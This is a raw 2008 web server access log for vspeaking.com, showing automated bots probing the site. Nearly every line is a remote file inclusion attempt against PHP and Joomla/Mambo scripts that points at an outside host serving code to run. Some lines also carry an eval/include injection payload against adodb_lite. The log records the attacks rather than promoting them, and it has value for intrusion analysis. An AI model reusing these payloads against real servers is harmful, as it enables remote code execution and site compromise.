209.85.108.8 - - [09/Nov/2008:16:01:56 -0800] "GET /logs/access_080804.log/errors.php?error=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:03:44 -0800] "GET /logs/access.log//group/errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:03:48 -0800] "GET /group/errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
216.239.0.245 - - [09/Nov/2008:16:04:39 -0800] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [09/Nov/2008:16:04:39 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [09/Nov/2008:16:04:40 -0800] "GET /logs//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:07:43 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:07:56 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:07:57 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:09:20 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:09:20 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:09:20 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:11:36 -0800] "GET /logs/access.log//webi/////errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:11:37 -0800] "GET /webi/////errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.247.43.5 - - [09/Nov/2008:16:11:38 -0800] "GET /logs/access_080825.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.247.43.5 - - [09/Nov/2008:16:11:38 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.247.43.5 - - [09/Nov/2008:16:11:39 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [09/Nov/2008:16:11:47 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
72.22.81.178 - - [09/Nov/2008:16:12:25 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
72.22.81.178 - - [09/Nov/2008:16:12:25 -0800] "GET /lostpasswd.php?env[include_prefix]=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
72.22.81.178 - - [09/Nov/2008:16:12:25 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:12:48 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:12:54 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:12:56 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:13:03 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:13:04 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:16:13:11 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:13:21 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:13:21 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
212.51.218.130 - - [09/Nov/2008:16:13:28 -0800] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
212.51.218.130 - - [09/Nov/2008:16:13:28 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
212.51.218.130 - - [09/Nov/2008:16:13:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:13:30 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:13:30 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:13:33 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:13:34 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:13:34 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:13:34 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:13:37 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:13:37 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
72.22.81.178 - - [09/Nov/2008:16:13:42 -0800] "GET /lostpasswd.php?env[include_prefix]=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:13:42 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:13:42 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:16:13:44 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:16:13:44 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:14:10 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:14:10 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:14:12 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:14:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:14:20 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:14:20 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
195.12.53.176 - - [09/Nov/2008:16:14:25 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.igrejabatistagenesis.com.br/web/help/mambo??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [09/Nov/2008:16:14:25 -0800] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.igrejabatistagenesis.com.br/web/help/mambo??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [09/Nov/2008:16:14:25 -0800] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.igrejabatistagenesis.com.br/web/help/mambo??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:14:28 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:14:28 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:15:34 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:15:34 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:16:16:28 -0800] "GET /logs/scripts.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:16:16:35 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:16:16:35 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:16:16:35 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:16:16:37 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:39 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:39 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:39 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:39 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:40 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.247.43.5 - - [09/Nov/2008:16:16:46 -0800] "GET /logs/access_080818.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:16:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:16:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:16:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:16:16:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:56 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
87.106.245.44 - - [09/Nov/2008:16:16:56 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:17:00 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:17:00 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:17:00 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:17:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:16:17:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:17:14 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:17:14 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:17:15 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:17:16 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:16:17:19 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [09/Nov/2008:16:17:36 -0800] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [09/Nov/2008:16:17:36 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.172.9.3 - - [09/Nov/2008:16:17:37 -0800] "GET /logs//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:16:17:44 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:18:23 -0800] "GET /logs/config.php?path_to_root=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:18:32 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:16:18:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:18:41 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:18:41 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:18:41 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
141.252.25.17 - - [09/Nov/2008:16:18:56 -0800] "GET /logs/access_080721.log/config.php?path_to_root=http://www.manifestotrl.org/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:19:16 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:19:16 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.169.169.99 - - [09/Nov/2008:16:19:16 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.85.32.31 - - [09/Nov/2008:16:19:35 -0800] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.85.32.31 - - [09/Nov/2008:16:19:35 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.85.32.31 - - [09/Nov/2008:16:19:36 -0800] "GET /logs//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:20:07 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:20:07 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:16:20:08 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:20:12 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:20:13 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:20:13 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:16:20:13 -0800] "GET /logs/access_080825.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
59.125.96.13 - - [09/Nov/2008:16:20:27 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
